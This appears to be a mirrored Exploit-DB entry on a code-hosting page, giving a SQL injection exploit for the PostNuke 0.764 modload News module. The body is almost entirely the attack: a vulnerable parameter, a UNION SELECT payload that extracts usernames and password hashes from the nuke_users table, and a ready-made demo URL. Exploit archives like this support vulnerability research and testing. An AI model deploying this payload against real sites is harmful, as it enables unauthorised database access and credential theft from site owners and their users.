bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12410.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

29 lines
No EOL
806 B
Text
Raw Blame History

PostNuke 0.764 Module modload SQL Injection Vulnerability
###########################
Author : BILGE_KAGAN
Homepage : http://www.1923turk.com
Script : postnuke http://www.postnuke.com
Download : http://www.postnuke.com/module-Content-view-pid-2.html
###########################
[ Vulnerable File ]
modules.php?op=modload&name=News&file=article&sid=[ SQL ]
[ XpL ]
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
[ Demo]
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
Reference in a new issue View git blame Copy permalink